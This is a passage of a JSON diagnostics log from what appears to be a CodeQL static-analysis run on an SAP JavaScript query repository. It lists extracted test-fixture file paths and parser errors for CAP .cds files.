{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/ui5.yaml","uriBaseId":"%SRCROOT%","index":615}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":616}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.html","uriBaseId":"%SRCROOT%","index":617}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.js","uriBaseId":"%SRCROOT%","index":618}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":619}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/TestFragment.fragment.xml","uriBaseId":"%SRCROOT%","index":620}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":621}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":622}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":623}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/.eslintrc.json","uriBaseId":"%SRCROOT%","index":624}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/package.json","uriBaseId":"%SRCROOT%","index":625}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/public/index.html","uriBaseId":"%SRCROOT%","index":626}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/App.tsx","uriBaseId":"%SRCROOT%","index":627}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/index.tsx","uriBaseId":"%SRCROOT%","index":628}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/package-lock.json","uriBaseId":"%SRCROOT%","index":629}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":630}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":631}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":632}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":633}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":634}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":635}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/.xsaccess","uriBaseId":"%SRCROOT%","index":636}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/exposed/.xsaccess","uriBaseId":"%SRCROOT%","index":637}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/missing_auth/.xsaccess","uriBaseId":"%SRCROOT%","index":638}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/service.xsjs","uriBaseId":"%SRCROOT%","index":639}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSAccess/service/xs-app.json","uriBaseId":"%SRCROOT%","index":640}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSReflectedXss/XSJSReflectedXss.xsjs","uriBaseId":"%SRCROOT%","index":641}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSSqlInjection/XSJSSqlInjection.xsjs","uriBaseId":"%SRCROOT%","index":642}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSUrlRedirect/XSJSUrlRedirect.xsjs","uriBaseId":"%SRCROOT%","index":643}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/xsjs/test/queries/XSJSZipSlip/XSJSZipSlip.xsjs","uriBaseId":"%SRCROOT%","index":644}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":645}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/qlpack.yml","uriBaseId":"%SRCROOT%","index":646}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"qlt.conf.json","uriBaseId":"%SRCROOT%","index":647}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":105},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":109},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":111},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds","uriBaseId":"%SRCROOT%","index":113},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":115},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":119},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":121},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds","uriBaseId":"%SRCROOT%","index":123},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds","uriBaseId":"%SRCROOT%","index":127},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds","uriBaseId":"%SRCROOT%","index":129},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":131},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":134},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":138},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds","uriBaseId":"%SRCROOT%","index":139},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds","uriBaseId":"%SRCROOT%","index":143},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds","uriBaseId":"%SRCROOT%","index":145},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds","uriBaseId":"%SRCROOT%","index":147},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds","uriBaseId":"%SRCROOT%","index":153},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds","uriBaseId":"%SRCROOT%","index":155},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":157},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":161},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":163},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds with error Error: Unexpected 